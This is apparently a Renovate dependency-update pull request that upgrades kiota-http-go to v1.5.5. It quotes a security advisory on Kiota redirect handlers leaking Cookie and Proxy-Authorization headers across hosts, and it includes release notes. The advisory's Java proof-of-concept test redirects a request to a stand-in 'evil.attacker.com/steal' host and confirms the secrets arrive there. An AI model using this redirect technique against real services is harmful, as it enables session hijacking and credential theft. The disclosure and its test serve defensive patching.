Update module github.com/microsoft/kiota-http-go to v1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/microsoft/kiota-http-go	v0.16.1 → v1.5.5

---

Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect

CVE-2026-44503 / GHSA-7j59-v9qr-6fq9

More information

Details

Summary

The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.

This vulnerability is present in the RedirectHandlers for:

https://github.com/microsoft/kiota-dotnet
https://github.com/microsoft/kiota-java
https://github.com/microsoft/kiota-python
https://github.com/microsoft/kiota-typescript
https://github.com/microsoft/kiota-http-go

Details

Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.

This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.

Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier:

boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
requestBuilder.removeHeader("Authorization");
// BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}

PoC

1. Clone the repository:
   git clone --depth 1 https://github.com/microsoft/kiota-java.git
   cd kiota-java

2. Create the PoC test file at:
   components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java

With this content:

package com.microsoft.kiota.http.middleware;
import static org.junit.jupiter.api.Assertions.*;
import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;

public class SecurityPoC {
@​Test
void crossHostRedirectLeaksCookies() throws Exception {
Request original = new Request.Builder()
.url("http://trusted.example.com/api")
.addHeader("Authorization", "Bearer token")
.addHeader("Cookie", "session=SECRET")
.addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
.build();
Response redirect = new Response.Builder()
.request(original).protocol(Protocol.HTTP_1_1)
.code(302).message("Found")
.header("Location", "http://evil.attacker.com/steal")
.body(ResponseBody.create("", MediaType.parse("text/plain")))
.build();
Request result = new RedirectHandler().getRedirect(original, redirect);
assertNotNull(result);
assertEquals("evil.attacker.com", result.url().host());
assertNull(result.header("Authorization")); // stripped (good)
assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
}

@​Test
void endToEndProof() throws Exception {
var evil = new MockWebServer();
evil.start();
evil.enqueue(new MockResponse().setResponseCode(200));
var trusted = new MockWebServer();
trusted.start();
trusted.enqueue(new MockResponse().setResponseCode(302)
.setHeader("Location", evil.url("/steal")));
OkHttpClient client = KiotaClientFactory.create(
new Interceptor[]{new RedirectHandler()}).build();
client.newCall(new Request.Builder().url(trusted.url("/api"))
.addHeader("Cookie", "session=SECRET").build()).execute();
trusted.takeRequest();
RecordedRequest captured = evil.takeRequest();
assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
evil.shutdown();
trusted.shutdown();
}
}

3. Run the tests:
   ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"

4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures.
   Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.

Impact

The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.

Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.

Impact:

• Session hijacking via leaked Cookie headers
• Corporate proxy credential theft via leaked Proxy-Authorization
• API key theft via leaked custom auth headers (X-API-Key, etc.)

All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.

Severity

• CVSS Score: 7.0 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

References

• https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9
• https://nvd.nist.gov/vuln/detail/CVE-2026-44503
• https://github.com/advisories/GHSA-7j59-v9qr-6fq9

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

microsoft/kiota-http-go (github.com/microsoft/kiota-http-go)

v1.5.5

Compare Source

Bug Fixes

• adding senstive headers scrub function (fba6ba4)
• adding senstive headers scrub function (39fa46c)
• adding senstive headers scrub function (ce4f0dc)
• adding senstive headers scrub function (e68b9e1)

v1.5.4

Compare Source

Bug Fixes

• retry handler exponential backoff (#​205) (2f2a350)

v1.5.3

Compare Source

Bug Fixes

• adding middleware with options errors with "unsupported option type" (beeb32d)

v1.5.2

Compare Source

Bug Fixes

• removes common go dependency (42c2137)
• removes common go dependency (df1bf28)

v1.5.1

Compare Source

Bug Fixes

• upgrades common go dependency to solve triming issues (4a57c46)
• upgrades common go dependency to solve triming issues (d1aa07f)

v1.5.0

Compare Source

Features

• upgrades required go version from go1.18 to go 1.22 (2e60cd5)

v1.4.7

Compare Source

Changed

• Updated HTTP span attributes to comply with updated OpenTelemetry semantic conventions. #​182

v1.4.6

Compare Source

Changed

• Fixed a bug where headers inspection handler would fail upon receiving an error.

v1.4.5

Compare Source

Changed

• Fixed a bug in compression middleware which caused empty body to send on retries

v1.4.4

Compare Source

Changed

• Added http.request.resend_delay as a span attribute for the retry handler
• Changed the http.retry_count span attribute to http.request.resend_count to conform to OpenTelemetry specs.

v1.4.3

Compare Source

Changed

• Fixed a bug to prevent double request compression by the compression handler.

v1.4.2

Compare Source

Changed

• Prevent compression if Content-Range header is present.
• Fix bug which leads to a missing Content-Length header.

v1.4.1

Compare Source

Changed

• Allow custom response handlers to return nil result values.

v1.4.0

Compare Source

• Support retry after as a date.

v1.3.3

Compare Source

• Fix bug where overriding http.DefaultTransport with an implementation other than http.Transport would result in an interface conversion panic

v1.3.2

Compare Source

Changed

• Fix bug with headers inspection handler using wrong key.

v1.3.1

Compare Source

Changed

• Fix bug that resulted in the error "content is empty" being returned instead of HTTP status information if the request returned no content and an unsuccessful status code.

v1.3.0

Compare Source

Added

• Added support to override default middleware with function GetDefaultMiddlewaresWithOptions.

v1.2.1

Compare Source

Changed

• Fix bug passing no timeout in client as 0 timeout in context .

v1.2.0

Compare Source

Added

• Adds support for XXX status code.

v1.1.2

Compare Source

Changed

• Changed the code by replacing ioutil.ReadAll and ioutil.NopCloser with io.ReadAll and io.NopCloser, respectively, due to their deprecation.

v1.1.1

Compare Source

Added

• Added response headers and status code to returned error in throwIfFailedResponse.

v1.1.0

Compare Source

Added

• Added headers inspection middleware and option.

v1.0.1

Compare Source

Changed

• Bug Fix: Update Host for Redirect URL in go client.

v1.0.0

Compare Source

Changed

• GA Release.

v0.17.0

Compare Source

Added

• Adds Response Headers to the ApiError returned on Api requests errors.

v0.16.2

Compare Source

Added

• Exit retry handler earlier if context is done.
• Adds exported method ReplacePathTokens that can be used to process url replacement logic globally.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 8 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.21.13 -> 1.23.0
github.com/go-logr/logr	v1.4.1 -> v1.4.2
github.com/google/go-cmp	v0.5.9 -> v0.7.0
github.com/google/uuid	v1.3.0 -> v1.6.0
github.com/hashicorp/go-retryablehttp	v0.7.7 -> v0.7.7
github.com/microsoft/kiota-abstractions-go	v0.19.0 -> v1.9.2
github.com/stretchr/testify	v1.9.0 -> v1.10.0
go.opentelemetry.io/otel	v1.14.0 -> v1.35.0
go.opentelemetry.io/otel/trace	v1.14.0 -> v1.35.0